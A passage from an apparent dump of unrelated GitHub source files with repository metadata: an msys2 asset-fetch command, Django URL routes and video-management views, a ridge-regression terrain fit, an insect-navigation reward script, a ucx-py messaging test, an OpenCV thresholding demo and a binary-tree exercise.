os.listdir(path):\n os.rmdir(path)\n\n # Finally figure out what to download\n todo = {}\n done = []\n for path, asset in to_fetch.items():\n if not os.path.exists(path) or path in not_uptodate:\n todo[path] = asset\n Path(path).parent.mkdir(parents=True, exist_ok=True)\n else:\n done.append(path)\n\n if args.verbose and all_blocked:\n import pprint\n print(\"Packages that are blocked and why:\")\n pprint.pprint(all_blocked)\n\n print(f\"downloading: {len(todo)}, done: {len(done)} \"\n f\"blocked: {len(all_blocked)} (related builds missing)\")\n\n print(\"Pass --verbose to see the list of blocked packages.\")\n print(\"Pass --fetch-complete to also fetch blocked but complete packages\")\n print(\"Pass --fetch-all to fetch all packages.\")\n print(\"Pass --delete to clear the target directory\")\n\n def fetch_item(item: Tuple[str, GitReleaseAsset]) -> Tuple[str, GitReleaseAsset]:\n asset_path, asset = item\n if not args.pretend:\n download_asset(asset, asset_path)\n return item\n\n with ThreadPoolExecutor(8) as executor:\n for i, item in enumerate(executor.map(fetch_item, todo.items())):\n print(f\"[{i + 1}/{len(todo)}] {get_asset_filename(item[1])}\")\n\n print(\"done\")\n\n\ndef add_parser(subparsers: Any) -> None:\n sub = subparsers.add_parser(\n \"fetch-assets\", help=\"Download all staging packages\", allow_abbrev=False)\n sub.add_argument(\"targetdir\")\n sub.add_argument(\n \"--delete\", action=\"store_true\", help=\"Clear targetdir of unneeded files\")\n sub.add_argument(\n \"--verbose\", action=\"store_true\", help=\"Show why things are blocked\")\n sub.add_argument(\n \"--pretend\", 
action=\"store_true\",\n help=\"Don't actually download, just show what would be done\")\n sub.add_argument(\n \"--fetch-all\", action=\"store_true\", help=\"Fetch all packages, even blocked ones\")\n sub.add_argument(\n \"--fetch-complete\", action=\"store_true\",\n help=\"Fetch all packages, even blocked ones, except incomplete ones\")\n sub.add_argument(\n \"-t\", \"--build-type\", action=\"append\",\n help=\"Only fetch packages for given build type(s) (may be used more than once)\")\n sub.add_argument(\n \"--noconfirm\", action=\"store_true\",\n help=\"Don't require user confirmation\")\n sub.set_defaults(func=fetch_assets)\n","repo_name":"msys2/msys2-autobuild","sub_path":"msys2_autobuild/cmd_fetch_assets.py","file_name":"cmd_fetch_assets.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"72"} +{"seq_id":"10113325905","text":"from django.urls import path, include\n\nfrom doctor.views import search, DoctorListView, profile, doctor_panel, doctor_expertise, doctor_request, doctor_visit\n\nurlpatterns = [\n path('search/', search, name='search'),\n path('visit//', doctor_visit, name='doctor_visit'),\n path('request/', doctor_request, name='doctor_request'),\n path('/', profile, name='doctor'),\n path('/panel/', doctor_panel, name='doctor_panel'),\n path('/panel/expertise/', doctor_expertise, name='doctor_expertise'),\n]","repo_name":"SalarKesha/SE-project","sub_path":"doctor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73840310313","text":"import numpy as np\nimport seaborn as sns\n\nfrom imageio import imread\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\nimport scipy.linalg as scl\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\n\n# /////// Functions /////// \n\ndef Designmatrix(x, y, n=5):\n \"\"\" \n create a design matrix dependent on the polynomial grade you want, with a base of 3.\n want the collumns of X to be [1, x, y, x^2, xy, y^2, x^3, x^2y, xy^2, y^3]\n and so on. \n \"\"\"\n if len(x.shape) > 1:\n x = np.ravel(x)\n y = np.ravel(y)\n\n N = len(x)\n l = int( (n+1)*(n+2)/2 ) # nr. of elements in beta\n X = np.ones((N,l))\n\n for i in range(1, n+1):\n q = int( (i)*(i+1)/2 )\n for k in range(i+1):\n X[:, q+k] = x**(i-k) * y**k\n \n return X\n\ndef SVDinv(A):\n \"\"\"\n Takes as input a numpy matrix A and returns inv(A) based on singular value decomposition (SVD).\n SVD is numerically more stable than the inversion algorithms provided by\n numpy and scipy.linalg at the cost of being slower.\n \n taken from Regressinon slides at https://compphysics.github.io/MachineLearning/doc/pub/Regression/html/Regression.html\n with some modifications\n \"\"\"\n U, s, VT = np.linalg.svd(A)\n D = np.zeros((len(U),len(VT)))\n for i in range(0,len(VT)):\n D[i,i]=s[i]\n return VT.T @ ( np.linalg.inv(D) @ U.T )\n# /////// !Functions /////// \n\n# Load the terrain\nterrain1 = imread('../resources/SRTM_data_Norway_1.tif')\n\n# make training arrays \nleny, lenx = terrain1.shape\nxarr = np.linspace(0, 1, lenx)\nyarr = np.linspace(0, 1, leny)\n\nxmat, ymat = np.meshgrid(xarr, yarr)\n\n#taking a slice of data for computing time\nnp.random.seed(2039)#this gives an ok approx for MSE, etc. 
\nN = 100\nstart = np.random.randint(0, 100, 1)[0]\n#print('start at: ', start)\nxmat = xmat[ start:start+N, start:start+N]\nymat = ymat[ start:start+N, start:start+N]\nzmat = terrain1[ start:start+N, start:start+N]\nx = xmat.ravel()\ny = ymat.ravel()\nz = zmat.ravel()\n\n\n#k = 5\n#degrees = np.arange(1, 16)\n#_lambda = np.logspace(-1.7, -1)\n\nk = 2\ndegrees = np.arange(1, 5)\n_lambda = np.logspace(-1.2, -1)\n\nkfold = KFold( n_splits=k, shuffle=True, random_state=5 )\n\n#////////////\nx_train, xvalidation, y_train, yvalidation, z_train, zvalidation = train_test_split(x, y, z, test_size=1./k)\narrsze=len(zvalidation)\n#///////////\n\n\nerror = np.zeros((len(_lambda), len(degrees)))\nbias = np.zeros((len(_lambda), len(degrees)))\nvar = np.zeros((len(_lambda), len(degrees)))\n\nminmse = 2\nlmbdmin = 0\ndegmin = 0\n\nfor lmbd in range(len(_lambda)):\n for deg in degrees:\n zpred = np.empty( (arrsze, k) )\n z_test = np.empty( (arrsze, k) )\n X = Designmatrix(x, y, deg) \n j = 0\n for traininds, testinds in kfold.split(X):\n\n ztrain = z[traininds]\n ztest = z[testinds]\n\n Xtrain = X[traininds]\n Xtest = X[testinds]\n\n XTX = Xtrain.T @ Xtrain\n beta = SVDinv(XTX + _lambda[lmbd]*np.identity(len(XTX))) @ Xtrain.T @ ztrain\n zpred[:,j] = Xtest @ beta\n z_test[:,j] = ztest\n j += 1\n\n error[ lmbd, deg-1 ] = np.mean( np.mean( (z_test - zpred)**2, axis=1, keepdims=True ) ) # mean of k MSE's \n bias[ lmbd, deg-1 ] = np.mean( (z_test - np.mean(zpred, axis=1, keepdims=True))**2 )\n var[ lmbd, deg-1 ] = np.mean( np.var(zpred, axis=1, keepdims=True) )\n if error[lmbd, deg-1] < minmse:\n minmse = error[lmbd, deg-1]\n lmbdmin = lmbd\n degmin = deg\n\nprint('len lambda: ', len(_lambda), '\\nlen degrees: ', len(degrees), '\\nerror.shape: ', error.shape)\n\nax = sns.heatmap(error)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'MSE for complexity and $\\lambda$')\nplt.show()\nax = sns.heatmap(bias)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'bias for complexity and $\\lambda$')\nplt.show()\nax = sns.heatmap(var)\nplt.xlabel('complexity')\nplt.ylabel(r'$\\lambda$')\nplt.title(r'variance for complexity and $\\lambda$')\nplt.show()\n\n# Unfinished\n#\n#X = Designmatrix(xvalidation, yvalidation, degmin) \n#X_train = Designmatrix(x_train, y_train, degmin)\n#XTX = X_train.T @ X_train\n#beta = SVDinv(XTX + _lambda[lmbdmin]*np.identity(len(XTX))) @ X_train.T @ z_train\n#zpred = X@ beta\n#\n##error = np.mean( (zvalidation - zpred)**2, axis=1, keepdims=True )\n##bias = (zvalidation - np.mean(zpred, axis=1, keepdims=True))**2 \n##var = np.var(zpred, axis=1, keepdims=True)\n##\n##print('\\n=========================', '\\nnordataridge\\n',\n## '\\nBest fit, vs validation set.\\nMSE = ', error, '\\nbias = ', bias, '\\nvariance = ', var, \n## '\\n=====================')\n#zvalidationmat = np.reshape(zvalidation,[70, 70]) \n#zpredmat = np.reshape(zpred,[70, 70]) \n#\n#fig = plt.figure()\n#\n#ax = fig.add_subplot(1, 2, 1, projection='3d')\n#surf = ax.plot_surface(\n# xmat, ymat, zvalidationmat, cmap=cm.coolwarm, linewidth=0, antialiased=False )\n#fig.colorbar(surf, shrink=0.5, aspect=5)\n#plt.title('validation')\n#\n#ax = fig.add_subplot(1, 2, 2, projection='3d')\n#surf = ax.plot_surface(\n# xmat, ymat, zpredmat, cmap=cm.coolwarm, linewidth=0, antialiased=False )\n#fig.colorbar(surf, shrink=0.5, 
aspect=5)\n#plt.title('fit')\n#plt.show()\n","repo_name":"ageriksen/machinelearning","sub_path":"proj/proj1/src/nordataridge.py","file_name":"nordataridge.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8333697135","text":"import pickle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom insect_rl.mdp.utils import grid_math\nfrom icecream import ic\n\n\n#actions = list(actions)\n#ic(config, actions)\n\ndef convert(df, actions, reward, trap_cost, traps=False):\n\n df[\"state_int\"] = df[[\"path_x\", \"path_y\"]].apply(grid_math.point_to_int, args=(config['width'],), axis=1)\n df[\"next_state_int\"] = df.state_int.shift(-1)\n df[\"next_x\"] = df.path_x.shift(-1)\n df[\"next_y\"] = df.path_y.shift(-1)\n\n df = df.dropna()\n df[\"next_state_int\"] = df.next_state_int.astype('int32')\n df[\"next_x\"] = df.next_x.astype('int32')\n df[\"next_y\"] = df.next_y.astype('int32')\n\n # remove the steps that stay at the same point?\n df = df[df['state_int'] != df['next_state_int']]\n\n def get_action(row):\n return tuple(np.array([row.next_x, row.next_y]) - np.array([row.path_x, row.path_y]))\n\n\n def is_goal(row):\n return (row.next_x, row.next_y) in config['goals']\n\n def is_trap(row):\n return (row.next_x, row.next_y) in config['traps']\n\n new_dfs = []\n actions = list(actions)\n\n by_ant = df.groupby([\"ant_nb\", \"trial_nb\"])\n for (ant,trial), frame in by_ant:\n f = frame.drop(frame.tail(1).index)\n f.next_state_int = f.next_state_int.astype(int)\n f[[\"next_x\", \"next_y\"]] = f[[\"next_x\", \"next_y\"]].astype(int)\n f[\"action\"] = f.apply(get_action, axis=1)\n f[\"action_int\"] = f.action.apply(actions.index)\n f[\"reached_goal\"] = f.apply(is_goal, axis=1)\n f[\"in_trap\"] = f.apply(is_trap, axis=1)\n f[\"reward\"] = 0.0\n f.reward = f.reward.where(~f.reached_goal, reward)\n if traps:\n f.reward = f.reward.where(~f.in_trap, trap_cost)\n\n f.drop([\"path_x\", \"path_y\", \"next_x\", \"next_y\"], axis=1, inplace=True)\n f.reset_index(drop=True, inplace=True)\n reached_goal_idx = f[f.reached_goal].iloc[0].name\n f = f[:reached_goal_idx + 1]\n\n new_dfs.append(f)\n\n df = pd.concat(new_dfs, ignore_index=True)\n\n return df\n\n\ndef compute_J(dataset, gamma=1.):\n \"\"\"\n Compute the cumulative discounted reward of each episode in the dataset.\n\n Args:\n dataset (DataFrame): the dataset to consider;\n gamma (float, 1.): discount factor.\n\n Returns:\n The cumulative discounted reward of the first episode and a list with\n the number of steps of each episode.\n\n \"\"\"\n\n J_trials = []\n n_steps = []\n for trial in pd.unique(dataset[\"trial_nb\"]):\n trial_data = dataset[dataset[\"trial_nb\"] == trial]\n discounted = []\n \n i = len(trial_data.index)\n n_steps.append(len(trial_data.index))\n for step in reversed(trial_data.index):\n i -= 1\n J = gamma ** i * trial_data.reward[step]\n #print(i, step)\n discounted.append(J)\n J_trials.append(sum(discounted))\n return J_trials[0], n_steps\n\n\n\nwith open(snakemake.input.env[0], 'rb') as config_file:\n config = pickle.load(config_file)\nactions = vars(grid_math)[snakemake.config['actions']]\nreward = float(snakemake.wildcards.reward)\ntrap_cost = float(snakemake.wildcards.trapcost)\n\ndf_nt = pd.read_csv(snakemake.input[0])\ndf_nt = convert(df_nt, actions, reward, trap_cost)\ndf_nt = df_nt.reset_index(drop=True)\n#df.to_csv(snakemake.output[0], index=False)\n\nJs_no_trap = []\nn_steps_no_trap = []\nfor ant in pd.unique(df_nt[\"ant_nb\"]):\n ant_df =
df_nt[df_nt[\"ant_nb\"] == ant]\n J, n_steps = compute_J(ant_df, gamma=snakemake.config[\"simulation_settings\"][\"discount_factor\"])\n Js_no_trap.append(J)\n n_steps_no_trap.append(n_steps)\n#np.save(snakemake.output[0], Js_no_trap)\nplt.plot(Js_no_trap)\nplt.title(\"Cumulative discounted rewards without trap\")\nplt.savefig(snakemake.output[0])\nplt.clf()\n\n####### trap\ndf_t = pd.read_csv(snakemake.input[1])\ndf_t = convert(df_t, actions, reward, trap_cost, traps=True)\ndf_t = df_t.reset_index(drop=True)\n\nJs_trap = []\nn_steps_trap = []\nfor ant in pd.unique(df_t[\"ant_nb\"]):\n ant_df = df_t[df_t[\"ant_nb\"] == ant]\n J, n_steps = compute_J(ant_df, gamma=snakemake.config[\"simulation_settings\"][\"discount_factor\"])\n Js_trap.append(J)\n n_steps_trap.append(n_steps)\n\nplt.plot(Js_trap)\nplt.title(\"Cumulative discounted rewards with trap\")\nplt.savefig(snakemake.output[1])\nplt.clf()\n#plt.show()\n\nn_steps_no_trap = [np.mean(ant) for ant in n_steps_no_trap]\nn_steps_trap = [np.mean(ant) for ant in n_steps_trap]\n#plt.plot(n_steps_trap)\nplt.title(\"Number of steps per trial\")\nplt.boxplot([n_steps_no_trap, n_steps_trap], labels=[\"no trap\", \"trap\"])\n#plt.show()\nplt.savefig(snakemake.output[2])\n","repo_name":"PaulinaFriemann/RL-InsectNavigation","sub_path":"v2/forward/workflow/scripts/convert_dataframe.py","file_name":"convert_dataframe.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18241927554","text":"import asyncio\nfrom functools import partial\n\nimport numpy as np\nimport pytest\n\nimport ucp\n\nmsg_sizes = [0] + [2**i for i in range(0, 25, 4)]\n\n\ndef _bytearray_assert_equal(a, b):\n assert a == b\n\n\ndef get_data():\n ret = [\n {\n \"allocator\": bytearray,\n \"generator\": lambda n: bytearray(b\"m\" * n),\n \"validator\": lambda recv, exp: _bytearray_assert_equal(recv, exp),\n \"memory_type\": \"host\",\n },\n {\n \"allocator\": partial(np.ones, dtype=np.uint8),\n \"generator\": partial(np.arange, dtype=np.int64),\n \"validator\": lambda recv, exp: np.testing.assert_equal(\n recv.view(np.int64), exp\n ),\n \"memory_type\": \"host\",\n },\n ]\n\n try:\n import cupy as cp\n\n ret.append(\n {\n \"allocator\": partial(cp.ones, dtype=np.uint8),\n \"generator\": partial(cp.arange, dtype=np.int64),\n \"validator\": lambda recv, exp: cp.testing.assert_array_equal(\n recv.view(np.int64), exp\n ),\n \"memory_type\": \"cuda\",\n }\n )\n except ImportError:\n pass\n\n return ret\n\n\ndef simple_server(size, recv):\n async def server(ep):\n recv = await ep.am_recv()\n await ep.am_send(recv)\n await ep.close()\n\n return server\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\"size\", msg_sizes)\n@pytest.mark.parametrize(\"blocking_progress_mode\", [True, False])\n@pytest.mark.parametrize(\"recv_wait\", [True, False])\n@pytest.mark.parametrize(\"data\", get_data())\nasync def test_send_recv_am(size, blocking_progress_mode, recv_wait, data):\n rndv_thresh = 8192\n ucp.init(\n options={\"RNDV_THRESH\": str(rndv_thresh)},\n blocking_progress_mode=blocking_progress_mode,\n )\n\n ucp.register_am_allocator(data[\"allocator\"], data[\"memory_type\"])\n msg = data[\"generator\"](size)\n\n recv = []\n listener = ucp.create_listener(simple_server(size, recv))\n num_clients = 1\n clients = [\n await ucp.create_endpoint(ucp.get_address(), listener.port)\n for i in range(num_clients)\n ]\n for c in clients:\n if recv_wait:\n # By sleeping here we ensure that the listener's\n # 
ep.am_recv call will have to wait, rather than return\n # immediately as receive data is already available.\n await asyncio.sleep(1)\n await c.am_send(msg)\n recv_msg = await c.am_recv()\n for c in clients:\n await c.close()\n listener.close()\n\n if data[\"memory_type\"] == \"cuda\" and msg.nbytes < rndv_thresh:\n # Eager messages are always received on the host, if no host\n # allocator is registered UCX-Py defaults to `bytearray`.\n assert recv_msg == bytearray(msg.get())\n else:\n data[\"validator\"](recv_msg, msg)\n","repo_name":"rapidsai/ucx-py","sub_path":"tests/test_send_recv_am.py","file_name":"test_send_recv_am.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"72"} +{"seq_id":"15332967024","text":"import cv2 as cv\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimg = cv.imread('sample_images/ImagesOriginalSize/Scol/N93, Rt TL AIS, F, 14 Yrs.jpg', cv.IMREAD_GRAYSCALE)\nassert img is not None, \"file could not be read, check with os.path.exists()\"\n\nC = 6\nAR = 5\n\n#img = cv.medianBlur(img,5)\nret,th1 = cv.threshold(img,127,255,cv.THRESH_BINARY)\nth2 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_MEAN_C,\\\n cv.THRESH_BINARY_INV,AR,C)\nth3 = cv.adaptiveThreshold(img,255,cv.ADAPTIVE_THRESH_GAUSSIAN_C,\\\n cv.THRESH_BINARY_INV,AR,C)\n\nedges1 = cv.Canny(img,50,100)\nedges2 = cv.Canny(th2,100,200)\nedges3 = cv.Canny(th3,100,200)\n\ndf = pd.DataFrame(edges1).replace(255, 1)\ntitles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding', 'Canny Original', 'Canny MEAN', 'Canny GAUSSIAN', 'MEANS']\nimages = [img, th1, th2, th3, edges1, edges2, edges3]\nfor i in range(len(images)):\n plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([])\nplt.show()\n","repo_name":"pedromartinssouza/escoliosis-diagnoser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2099299425","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @return: the root of the minimum subtree\n \"\"\"\n def findSubtree(self, root):\n # write your code here\n if not root:\n return\n node, rootSum, minSum = self.dfs(root)\n return node\n \n def dfs(self, node):\n if not node:\n return (None, 0, float('inf'))\n (leftMinNode, leftSum, leftMinSum), (rightMinNode, rightSum, rightMinSum) = self.dfs(node.left), self.dfs(node.right)\n minSum = min(leftMinSum, rightMinSum, node.val + leftSum + rightSum)\n\n if minSum == node.val + leftSum + rightSum:\n return (node, minSum, minSum)\n if minSum == leftMinSum:\n return (leftMinNode, node.val + leftSum + rightSum, minSum)\n if minSum == rightMinSum:\n return (rightMinNode, node.val + leftSum + rightSum, minSum)\n","repo_name":"GuanYangCLU/AlgoTestForPython","sub_path":"LintCode/ladder/chapter_5/0596_Minimum_Subtree.py","file_name":"0596_Minimum_Subtree.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74670523432","text":"import math\nimport time\nimport traceback\nimport uuid\nfrom datetime import date\nimport random\n\nfrom 
django.core.exceptions import BadRequest, ObjectDoesNotExist\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.files.storage import FileSystemStorage\n\nfrom .models import Video, Labels, VideoLabels, DeleteRequests\nfrom .video_manager import *\n\n\ndef update_views(video_id=-1):\n \"\"\"\n Update views in the labels table. This will enable to do recommendations based upon views\n :param video_id:\n -1 - (Hard update): This will check for every video and update the category accordingly.\n Used when new video is deleted or labels are changed.\n video_id - (Soft update): This will just update the rows relevant to the given video\n Used when a video is watched.\n :return: None\n \"\"\"\n if video_id == -1:\n label_ids = [elements['id'] for elements in Labels.objects.values(\"id\")]\n\n for label in label_ids:\n total_views = 0\n videos = VideoLabels.objects.filter(label=label).values()\n for video in videos:\n current_video_id = video['video']\n video_obj = Video.objects.filter(id=current_video_id)\n views = video_obj.get().views\n total_views += views\n\n label_obj = Labels.objects.get(id=label)\n label_obj.views = total_views\n label_obj.save()\n print(\"Updated total views\")\n\n else:\n vid_labels = VideoLabels.objects.filter(video=video_id).values()\n\n for vid_label in vid_labels:\n label_id = vid_label['label']\n label_obj = Labels.objects.get(id=label_id)\n label_obj.views += 1\n label_obj.save()\n\n\ndef get_label_ids(_labels):\n label_ids = []\n for curr_label in _labels:\n if curr_label != \"\":\n if Labels.objects.filter(label=curr_label).exists():\n label_ids.append(Labels.objects.get(label=curr_label).id)\n return label_ids\n\n\ndef get_set_label_ids(_labels):\n label_ids = []\n for curr_label in _labels:\n if curr_label != \"\":\n if Labels.objects.filter(label=curr_label).exists():\n label_ids.append(Labels.objects.get(label=curr_label).id)\n else:\n lab_obj = Labels.objects.create(label=curr_label, views=0)\n lab_obj.save()\n label_ids.append(Labels.objects.get(label=curr_label).id)\n\n return label_ids\n\n\ndef save_labels(video_id, label_ids):\n vid_label_obj = VideoLabels.objects.filter(video=video_id)\n if len(vid_label_obj) != 0:\n for curr_obj in vid_label_obj:\n curr_obj.delete()\n\n for curr_id in label_ids:\n vid_lbl_obj = VideoLabels.objects.create(video=video_id, label=curr_id)\n vid_lbl_obj.save()\n update_views()\n\n\ndef check_label_is_used(label):\n label_id = Labels.objects.get(label=label).id\n return VideoLabels.objects.filter(label=label_id).exists()\n\n\ndef video_object(videos, request):\n data = []\n host = request.get_host()\n for video in videos:\n data.append({\n \"id\": video.id,\n \"title\": video.title,\n \"preview\": host + \"/\" + video.prev_loc,\n \"thumbnail\": host + \"/\" + video.thumb_loc,\n \"length\": video.length,\n \"views\": video.views\n })\n return data\n\n\ndef video_sets_creator(videos):\n data = []\n for video in videos:\n data.append((video.id, video.title, video.location, \"/\" + video.prev_loc, \"/\" + video.thumb_loc, video.date, video.length, video.views))\n return data\n\n\ndef recommendations_creator():\n most_viewed_labels = [label_id['id'] for label_id in Labels.objects.all().order_by('-views').values()[:3]]\n least_viewed_labels = [label_id['id'] for label_id in 
Labels.objects.all().order_by('views').values()[:3]]\n recommended_videos = []\n\n for label in most_viewed_labels:\n current_videos = VideoLabels.objects.filter(label=label)\n videos_in_the_label = [obj.video for obj in current_videos]\n random.shuffle(videos_in_the_label)\n\n for video in videos_in_the_label:\n if video not in recommended_videos:\n recommended_videos.append(video)\n break\n\n for label in least_viewed_labels:\n current_videos = VideoLabels.objects.filter(label=label)\n videos_in_the_label = [obj.video for obj in current_videos]\n random.shuffle(videos_in_the_label)\n\n for video in videos_in_the_label:\n if video not in recommended_videos:\n recommended_videos.append(video)\n break\n return recommended_videos\n\n\ndef recommendations(request):\n recommended = recommendations_creator()\n videos = []\n for video in recommended:\n videos.append(Video.objects.get(id=video))\n data_dict = {\"data\": video_object(videos, request)}\n return JsonResponse(data_dict)\n\n\ndef labels(request):\n if request.method == \"GET\":\n get_body = request.GET\n labels_list = get_body.getlist('labels')\n if len(labels_list) == 0 and 'video-id' not in get_body and 'remove' not in get_body:\n _labels = Labels.objects.values('label').order_by('label')\n return JsonResponse({\"labels\": [label['label'] for label in _labels]})\n\n label_ids = get_set_label_ids(labels_list)\n if 'video-id' in get_body:\n try:\n req_id = int(request.GET['video-id'])\n Video.objects.get(id=req_id)\n except ValueError:\n raise BadRequest(\"Invalid Request\")\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid video id\")\n\n print(label_ids)\n save_labels(req_id, label_ids)\n\n return HttpResponse(\"OK\")\n\n try:\n if not check_label_is_used(request.GET['remove']):\n label = Labels.objects.get(label=request.GET['remove'])\n label.delete()\n return HttpResponse(\"OK\")\n else:\n return HttpResponse(\"Label is already in use\", status=400)\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid label to remove\")\n except MultiValueDictKeyError:\n raise BadRequest()\n\n\ndef video_remover(vid_id):\n if Video.objects.filter(id=vid_id).exists():\n vid_labels = VideoLabels.objects.filter(video=vid_id)\n for curr_label in vid_labels:\n curr_label.delete()\n\n video = Video.objects.get(id=vid_id)\n video_path = os.path.dirname(video.location)[:-5]\n video.delete()\n remove_folder(video_path)\n return True\n else:\n return False\n\n\ndef delete_videos(request):\n if request.method == \"GET\":\n get_body = request.GET\n if 'video-id' in get_body:\n unique_id = str(uuid.uuid4().hex)\n seconds = int(time.time())\n\n try:\n req_id = int(get_body['video-id'])\n except ValueError:\n raise BadRequest(\"Invalid video id\")\n\n del_req = DeleteRequests(unique_id, req_id, seconds)\n del_req.save()\n\n return JsonResponse({\"videoId\": req_id, \"requestId\": unique_id})\n elif 'request-id' in get_body:\n conf_id = get_body['request-id']\n if DeleteRequests.objects.filter(confirmation_id=conf_id).exists():\n del_req = DeleteRequests.objects.get(confirmation_id=conf_id)\n vid_id = del_req.video\n elapsed_time = int(time.time()) - int(del_req.requested_millis)\n\n if elapsed_time < 120:\n if video_remover(vid_id):\n update_views()\n return JsonResponse({\"status\": \"OK\"})\n else:\n return JsonResponse({\"status\": \"Failed\"}, status=400)\n\n else:\n return JsonResponse({\"status\": \"TimeOut\"}, status=400)\n\n else:\n raise BadRequest(\"Invalid request id\")\n\n else:\n raise BadRequest(\"'video-id' not found\")\n\n\ndef 
get_video_labels(video_id):\n label_ids = [obj.label for obj in VideoLabels.objects.filter(video=video_id)]\n _labels = [Labels.objects.get(id=obj).label for obj in label_ids]\n return _labels\n\n\n@csrf_exempt\ndef say_hello(request):\n return HttpResponse(loader.get_template('index.html').render())\n\n\n@csrf_exempt\ndef upload(request):\n if request.method == \"POST\":\n uploaded_files = request.FILES.getlist(\"file\")\n vid_labels = request.POST.getlist('labels')\n\n if len(uploaded_files) == 0:\n return HttpResponse(\"InvalidRequest\")\n\n failed_files = {}\n succeeded = {}\n\n for curr_file in uploaded_files:\n fs = FileSystemStorage()\n print(date.today())\n\n file_name = curr_file.name\n file_type = curr_file.content_type.split('/')[0]\n\n if len(uploaded_files) == 1:\n try:\n video_title = request.POST.getlist('name')[0]\n except IndexError:\n video_title = file_name.split('.')[0]\n\n if video_title == \"\":\n video_title = file_name.split('.')[0]\n else:\n video_title = file_name.split('.')[0]\n\n unique_filename = str(uuid.uuid4().hex)\n\n path = \"media/videos/\" + unique_filename\n\n if file_type != \"video\":\n failed_files[file_name] = \"InvalidType\"\n remove_folder(path)\n continue\n\n file_ext = str(file_name).split('.')[-1]\n\n _file = \"media/videos/%s/video/\" % unique_filename + unique_filename + \".\" + file_ext\n file_media_path = \"videos/%s/video/\" % unique_filename + unique_filename + \".\" + file_ext\n\n make_folder(\"media/videos/%s/video/\" % unique_filename)\n fs.save(file_media_path, curr_file)\n\n try:\n duration = video_duration(_file)\n except Exception:\n failed_files[file_name] = \"ParseError\"\n remove_folder(path)\n continue\n\n if duration < 15:\n failed_files[file_name] = \"ShortVideo\"\n remove_folder(path)\n continue\n\n try:\n generate_thumbnail(_file, 0.2, \"media/videos/%s/thumbnail/\" % unique_filename, \"thumbnail.jpg\")\n generate_preview(_file, duration, \"media/videos/%s/preview/\" % unique_filename, \"preview.mp4\")\n\n except Exception:\n failed_files[file_name] = \"ParseError\"\n remove_folder(path)\n continue\n\n try:\n video = Video.objects.create(\n title=video_title,\n location=_file,\n prev_loc=\"media/videos/%s/preview/%s\" % (unique_filename, \"preview.mp4\"),\n thumb_loc=\"media/videos/%s/thumbnail/%s\" % (unique_filename, \"thumbnail.jpg\"),\n views=0,\n length=int(duration)\n )\n video.save()\n\n vid_id = video.id\n label_ids = get_set_label_ids(vid_labels)\n\n save_labels(vid_id, label_ids)\n succeeded[vid_id] = video_title\n\n except Exception:\n print(\"Database failed\")\n remove_folder(path)\n traceback.print_exc()\n\n return JsonResponse({\n \"failedFiles\": failed_files,\n \"succeeded\": succeeded\n })\n else:\n return HttpResponse(\"Invalid request method\")\n\n\ndef paged_video_data(videos, request, page=-1, no_of_videos=15):\n max_videos = len(videos)\n starting_index = 0 if page == -1 else (page - 1) * no_of_videos\n ending_index = max_videos if page == -1 else page * no_of_videos\n data_dict = {\"data\": [], \"pages\": int(math.ceil(max_videos / no_of_videos))}\n host = request.get_host()\n for row in videos[starting_index:ending_index]:\n data_dict['data'].append({\n \"id\": row[0],\n \"title\": row[1],\n \"preview\": host + \"/\" + row[3],\n \"thumbnail\": host + \"/\" + row[4],\n \"length\": row[6],\n \"views\": row[7]\n })\n return data_dict\n\n\ndef get_all_videos(request):\n if request.method == \"GET\":\n get_body = request.GET\n if 'video-id' in get_body:\n try:\n req_id = int(get_body['video-id'])\n video_obj = Video.objects.get(id=req_id)\n
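            # a non-numeric id raises ValueError and an unknown id raises ObjectDoesNotExist;\n            # both are turned into a BadRequest by the handlers below\n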
